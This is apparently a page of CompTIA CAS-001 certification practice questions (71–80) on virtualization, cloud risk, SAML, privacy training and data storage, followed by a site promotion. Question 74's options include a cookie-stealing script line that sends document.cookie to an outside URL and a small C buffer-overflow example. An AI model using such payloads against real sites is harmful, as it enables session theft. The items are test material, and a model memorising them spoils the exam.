CAS-001 Exam Details

  • Exam Code
    :CAS-001
  • Exam Name
    :CompTIA Advanced Security Practitioner
  • Certification
    :CompTIA Advanced Security Practitioner
  • Vendor
    :CompTIA
  • Total Questions
    :493 Q&As
  • Last Updated
    :Jan 22, 2024

CompTIA CAS-001 Online Questions & Answers

  • Question 71:

    An administrator has four virtual guests on a host server. Two of the servers are corporate SQL servers, one is a corporate mail server, and one is a testing web server for a small group of developers. The administrator is experiencing difficulty connecting to the host server during peak network usage times.

    Which of the following would allow the administrator to securely connect to and manage the host server during peak usage times?

    A. Increase the virtual RAM allocation to high I/O servers.
    B. Install a management NIC and dedicated virtual switch.
    C. Configure the high I/O virtual servers to use FCoE rather than iSCSI.
    D. Move the guest web server to another dedicated host.

  • Question 72:

    The Chief Executive Officer (CEO) of a corporation decided to move all email to a cloud computing environment. The Chief Information Security Officer (CISO) was told to research the risk involved in this environment. Which of the following measures should be implemented to minimize the risk of hosting email in the cloud?

    A. Remind users that all emails with sensitive information need be encrypted and physically inspect the cloud computing.
    B. Ensure logins are over an encrypted channel and obtain an NDA and an SLA from the cloud provider.
    C. Ensure logins are over an encrypted channel and remind users to encrypt all emails that contain sensitive information.
    D. Obtain an NDA from the cloud provider and remind users that all emails with sensitive information need be encrypted.

  • Question 73:

    New zero-day attacks are announced on a regular basis against a broad range of technology systems.

    Which of the following best practices should a security manager do to manage the risks of these attack vectors? (Select TWO).

    A. Establish an emergency response call tree.
    B. Create an inventory of applications.
    C. Backup the router and firewall configurations.
    D. Maintain a list of critical systems.
    E. Update all network diagrams.

  • Question 74:

    Which of the following displays an example of a buffer overflow attack?

    A. document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
    B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
    C. #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }
    D. Username: PassworD.

  • Question 75:

    A Chief Information Security Officer (CISO) has been trying to eliminate some IT security risks for several months. These risks are not high profile but still exist. Furthermore, many of these risks have been mitigated with innovative solutions. However, at this point in time, the budget is insufficient to deal with the risks.

    Which of the following risk strategies should be used?

    A. Transfer the risks
    B. Avoid the risks
    C. Accept the risks
    D. Mitigate the risks

  • Question 76:

    There has been a recent security breach which has led to the release of sensitive customer information. As part of improving security and reducing the disclosure of customer data, a training company has been employed to educate staff. Which of the following should be the primary focus of the privacy compliance training program?

    A. Explain how customer data is gathered, used, disclosed, and managed.
    B. Remind staff of the company's data handling policy and have staff sign an NDA.
    C. Focus on explaining the "how" and "why" customer data is being collected.
    D. Republish the data classification and the confidentiality policy.

  • Question 77:

    Which of the following does SAML uses to prevent government auditors or law enforcement from identifying specific entities as having already connected to a service provider through an SSO operation?

    A. Transient identifiers
    B. Directory services
    C. Restful interfaces
    D. Security bindings

  • Question 78:

    Company A is merging with Company B. Company B uses mostly hosted services from an outside vendor, while Company A uses mostly in-house products. The project manager of the merger states the merged systems should meet these goals:

    Ability to customize systems per department

    Quick implementation along with an immediate ROI

    The internal IT team having administrative level control over all products

    The project manager states the in-house services are the best solution. Because of staff shortages, the senior security administrator argues that security will be best maintained by continuing to use outsourced services.

    Which of the following solutions BEST solves the disagreement?

    A. Raise the issue to the Chief Executive Officer (CEO) to escalate the decision to senior management with the recommendation to continue the outsourcing of all IT services.
    B. Calculate the time to deploy and support the in-sourced systems accounting for the staff shortage and compare the costs to the ROI costs minus outsourcing costs. Present the document numbers to management for a final decision.
    C. Perform a detailed cost benefit analysis of outsourcing vs. in-sourcing the IT systems and review the system documentation to assess the ROI of in-sourcing. Select COTS products to eliminate development time to meet the ROI goals.
    D. Arrange a meeting between the project manager and the senior security administrator to review the requirements and determine how critical all the requirements are.

  • Question 79:

    An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service. Which of the following should the company ensure is supported by the third- party? (Select TWO).

    A. LDAP/S
    B. SAML
    C. NTLM
    D. OAUTH
    E. Kerberos

  • Question 80:

    A database administrator comes across the below records in one of the databases during an internal audit of the payment system:

    UserID Address Credit Card No. Password jsmith 123 fake street 55XX-XXX-XXXX-1397 Password100 jqdoe 234 fake street 42XX-XXX-XXXX-2027 17DEC12 From a security perspective, which of the following should be the administrator's GREATEST concern, and what will correct the concern?

    A. Concern: Passwords are stored in plain text. Correction: Require a minimum of 8 alphanumeric characters and hash the password.
    B. Concern: User IDs are also usernames, and could be enumerated, thereby disclosing sensitive account information. Correction: Require user IDs to be more complex by using alphanumeric characters and hash the UserIDs.
    C. Concern: User IDs are confidential private information. Correction: Require encryption of user IDs.
    D. Concern: More than four digits within a credit card number are stored. Correction: Only store the last four digits of a credit card to protect sensitive financial information.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.